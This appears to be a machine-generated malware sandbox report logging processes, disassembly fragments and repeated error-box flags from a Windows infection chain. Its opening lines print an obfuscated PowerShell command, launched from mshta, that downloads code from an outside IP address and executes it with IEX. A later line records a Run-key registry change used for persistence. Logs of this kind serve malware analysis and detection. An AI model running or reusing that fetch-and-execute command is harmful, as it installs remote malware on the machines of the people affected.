                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X Jump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X Jump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF8488EB4EC push ebx; retf 5_2_00007FF8488EB4ED
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF8488EC89C pushad ; iretd 5_2_00007FF8488EC89D
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF8488DB4EC push ebx; retf 7_2_00007FF8488DB4ED
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF8488DC89C pushad ; iretd 7_2_00007FF8488DC89D
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF8488D10E8 push E85DD6FBh; ret 7_2_00007FF8488D10F9
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF84890B4EC push ebx; retf 8_2_00007FF84890B4ED
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF84890C89C pushad ; iretd 8_2_00007FF84890C89D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_00441860 push eax; mov dword ptr [esp], 424D4C7Fh13_2_00441864
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0043A6F5 push esi; retf 13_2_0043A6FE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run NULLJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run NULLJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
